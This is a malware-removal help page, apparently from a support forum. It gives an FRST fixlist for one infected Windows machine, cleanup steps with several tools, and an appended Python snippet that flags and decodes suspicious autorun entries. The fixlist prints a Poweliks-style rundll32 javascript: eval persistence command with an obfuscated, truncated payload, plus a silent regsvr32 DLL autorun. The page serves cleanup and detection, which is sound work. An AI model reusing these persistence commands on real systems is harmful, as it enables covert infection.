Primary Computer Service, Inc.

TrojanClicker:JS/Chroject.A

Removal

STEP 1
Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + R on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
     
    start
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    (Google Inc.) C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv\zcvlhkawngzw\Zuyrhtjreygq.exe
    C:\Users\Admin\AppData\LocalLow\EmieSiteList\sezovopqwirv
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\Run: [Sweggnoj] => regsvr32.exe /s "C:\Users\Admin\AppData\Local\58f0589f-a561-4667-5773-4c7f2ba23b10\Sweggnoj.dll" <===== ATTENTION
    C:\Users\Admin\AppData\Local\58f0589f-a561-4667-5773-4c7f2ba23b10
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26b23-0f2f-11e3-a879-a4badbfb40f2} - F:\TL-Bootstrap.exe
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26b36-0f2f-11e3-a879-a4badbfb40f2} - F:\TLBootstrap_WPP.exe
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26c4f-0f2f-11e3-a879-a4badbfb40f2} - F:\MotoCastSetup.exe -a
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {1ddb4c7a-db38-11e3-8557-a4badbfb40f2} - F:\VZW_Software_upgrade_assistant.exe
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {80984420-ab1b-11e3-8f37-806e6f6e6963} - F:\TL-Bootstrap.exe
    HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
    SearchScopes: HKCU - {D1BFB61D-2524-4C81-9F58-085523C23FD2} URL = http://www.search.ask.com/web?tpid=ORJ-SPE&o=APN11405&pf=V7&p2=^BBD^OSJ000^YY^US&gct=&itbv=12.15.1.20&apn_uid=1F5600AD-D1F2-4D2A-A6B5-2B78500AF007&apn_ptnrs=BBD&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17207&doi=2014-08-02&trgb=IE&q={searchTerms}&psv=&pt=tb
    2014-11-05 14:32 - 2014-11-05 14:32 - 00004040 _____ () C:\Windows\System32\Tasks\{29F6539F-318F-3007-3AC4-DDBAB36BDA4B}
    2014-11-05 14:32 - 2014-11-05 14:32 - 00000000 _____ () C:\Users\Admin\AppData\Roaming\mswjwi.dll
    2014-10-24 14:41 - 2014-10-24 14:42 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
    2014-10-22 21:59 - 2014-10-27 13:59 - 00000000 ____D () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
    C:\Users\Admin\AppData\Local\Temp\APNSetup.exe
    C:\Users\Admin\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
    C:\Users\Admin\AppData\Local\Temp\HiRezLauncherControls.dll
    C:\Users\Admin\AppData\Local\Temp\install_flashplayer11x32ax_aaa_aih.exe
    C:\Users\Admin\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
    C:\Users\Admin\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
    C:\Users\Admin\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe
    C:\Users\Admin\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
    C:\Users\Admin\AppData\Local\Temp\ose00000.exe
    C:\Users\Admin\AppData\Local\Temp\SAS6_Update.exe
    C:\Users\Admin\AppData\Local\Temp\SkypeSetup.exe
    C:\Users\Admin\AppData\Local\Temp\vymalru.dll
    CustomCLSID: HKU\S-1-5-21-1838106421-2317848846-1109280923-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_0favicon-2079221766
    AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_1favicon1313128964
    AlternateDataStreams: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_2favicon-2092717923
    Task: {05D3DCA2-B794-4503-A644-5DB08442052E} - System32\Tasks\{29F6539F-318F-3007-3AC4-DDBAB36BDA4B} => C:\Users\Admin\AppData\Roaming\vclcog.dll/s "C:\Users\Admin\AppData\Roaming\vclcog.dll" <==== ATTENTION
    C:\Users\Admin\AppData\Roaming\vclcog.dll
    Folder: C:\Users\Admin\AppData
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset all
    CMD: netsh int ipv4 reset
    CMD: netsh int ipv6 reset
    EmptyTemp:
    end
  • Click File, then Save As, and type fixlist.txt as the File Name.
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. This log will be very large. Ensure you attach the file in your next reply!
     

STEP 2
Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is checked and click Scan Now.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards. 
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 
     

STEP 3
AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan.
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean.
  • Follow the prompts and allow your computer to reboot.
  • After rebooting, a log (AdwCleaner[s0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 
 
 

 

STEP 4
Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 5
Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

 
======================================================
 
STEP 6
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt (attached!)
  • MBAM log
  • AdwCleaner[s0].txt
  • JRT.txt
  • FRST.txt
  • Addition.txt
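
Added example (not part of the original instructions or of FRST): a small triage pass over FRST-style lines like those in the STEP 1 fixlist, pulling out the entries FRST itself flagged and the two autorun patterns visible there, regsvr32 /s loading a DLL from AppData and rundll32 started with an inline javascript: command. The rule names and the unshift helper are assumptions of this example; shifting each character down by one is simply what turns the eval argument in this sample into readable script text, not a general rule.

```python
import re

# Entries copied from the STEP 1 fixlist on this page; they describe that one machine.
SAMPLE = r'''
HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\Run: [Sweggnoj] => regsvr32.exe /s "C:\Users\Admin\AppData\Local\58f0589f-a561-4667-5773-4c7f2ba23b10\Sweggnoj.dll" <===== ATTENTION
HKU\S-1-5-21-1838106421-2317848846-1109280923-1001\...\MountPoints2: {0cf26c4f-0f2f-11e3-a879-a4badbfb40f2} - F:\MotoCastSetup.exe -a
CustomCLSID: HKU\S-1-5-21-1838106421-2317848846-1109280923-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {05D3DCA2-B794-4503-A644-5DB08442052E} - System32\Tasks\{29F6539F-318F-3007-3AC4-DDBAB36BDA4B} => C:\Users\Admin\AppData\Roaming\vclcog.dll/s "C:\Users\Admin\AppData\Roaming\vclcog.dll" <==== ATTENTION
CMD: ipconfig /flushdns
'''.strip().splitlines()

# Hypothetical rule names; each regex matches text visible in the sample lines.
RULES = {
    "frst-flag": re.compile(r"<=+\s*(ATTENTION|Poweliks)"),
    "rundll32-inline-script": re.compile(r"rundll32(\.exe)?\s+javascript:", re.I),
    "regsvr32-silent-user-dll": re.compile(r'regsvr32(\.exe)?\s+/s\s+"[^"]*\\AppData\\', re.I),
}
# FRST truncates long registry data, so the eval argument may end at its truncation note.
EVAL_ARG = re.compile(r'eval\("(.*?)(?: \(the data entry has|"|$)')


def unshift(text, k=1):
    """Shift every character down by k code points (k=1 fits this sample)."""
    return "".join(chr(ord(c) - k) for c in text)


def triage(lines):
    """Return one finding per line that matches at least one rule."""
    findings = []
    for number, line in enumerate(lines, 1):
        tags = [name for name, rx in RULES.items() if rx.search(line)]
        if not tags:
            continue
        match = EVAL_ARG.search(line) if "rundll32-inline-script" in tags else None
        decoded = unshift(match.group(1)) if match else None
        findings.append({"line": number, "tags": tags, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

The decoded text is only the visible prefix of the registry value, because FRST cut the entry short in its log.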